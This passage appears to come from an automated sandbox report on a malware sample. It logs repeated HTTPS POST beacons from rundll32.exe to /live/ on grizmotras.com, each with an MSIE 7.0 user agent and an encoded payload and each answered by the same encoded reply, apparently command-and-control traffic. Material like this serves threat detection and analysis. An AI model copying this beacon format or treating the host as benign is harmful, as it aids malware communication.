                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a76a9326db0-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:13 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                36192.168.2.549759172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:13 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:13 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:18 UTC574INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kHIw4P2AdUN9SnPfOwp4mPtx5TK7WKQjcakS33lzjiHp4LZDI9LusEcgTFCV4MIzocZUrCzUoMIPfodfjXHvxJkluAkobHUzVSIjnlCZldg%2Fjdnihk%2BnYxtZFFkuN6fRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99aa7d9635c7b-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:18 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                37192.168.2.549760172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:19 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:19 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:23 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yCRv2sowikHOmB7ZOOkwIOQC2Fftl6R5AylAE%2BeZOi%2B2Iw%2FJ4TdWiG%2B2lxFLILOiPtQ1mIF%2FgoRP45lsywbyRofalQ5CKmrCbZpaTKFOakorosMrvbQL6RTq6HJHAiX6vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99acb7e174c04-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:23 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                38192.168.2.549761172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:23 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:23 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:31 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YeAzL4RYJsBnkS%2BgBtEqq7qRIrBmJioudMrxkCHw5jUjMszvvs%2BFE%2FTDRXr8Ct09FRxMX%2F2NkqA%2FgxYlRFPkYeE9lqhMTkHwAj65npcHs1cuMRDxxwvGQxWp5p1Q3%2FExag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99ae8b98ea4d3-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:31 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                39192.168.2.549762172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:31 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:31 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:35 UTC584INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4Xt68Cphe4qmYP40h5mT34QuNb%2BUWywAeLDAS7cwVWcrQpoZ1r9GO7n3mTaZCiiO9y6QJFhqjzhuH%2Ft%2FI9BCnmjppQ4F%2BE529ZjTy%2FqKn%2FfobUPrq7%2BkVTPaeRDMxnd1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b18585ca662-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:35 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                40192.168.2.549763172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:35 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:35 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqAsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:40 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nHXgPaFkANiStf4xdEMOh%2BSu%2BK310AkFe4plSSiqtzKo09LGe%2FW%2FVg2rQhl1kop9s5cBuyPACJa5AfFnYwFYWuSVYnuFM8sHsYNX3l3nJ91%2Buzl66HbVoDVmsKJjeKyTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b31693aa4f8-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:40 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                41192.168.2.549764172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:40 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:40 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:45 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:45 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32e3jKfvfs2%2BturCG7P112Hb5Z%2Fbqge8729MVwy870VS6UjlkynteI0Y4a8SddkBpHoryNLuoptsFVNg1IC1EBGVvlV%2FFp9s%2FzO29%2Bqtwor7kspnQFpHJv0xzigCIQp%2FHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b51b83fa578-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:45 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                42192.168.2.549765172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:46 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:46 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqDMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:50 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvxQV%2FgeYKf3vJsEEMNMMbCXQP43AMsrp8%2FW6W2Ts4wtdkZmqVgqaJkttlS8HtjMACdEH09M%2FfrihoAq1QUMbJjectgLocY71ZRunwyhRDUYK5abpE7nr2KBePl%2BY96dhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b746d09a558-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:50 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                43192.168.2.549766172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:50 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:50 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:54 UTC576INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1RYEJ4MMuDPUjCh%2Bd7v8uIC4nrcsyk3T1avSQF%2FrkiIZsQMKlz7o8i3%2FK7Uu72MQE7lgwiIDHwfn8fhjaOzpoT1G7ZaivgeZ5mzrB5pC0fKvgoBGxAkhXvhA2PoYuqZCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b904abd2594-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
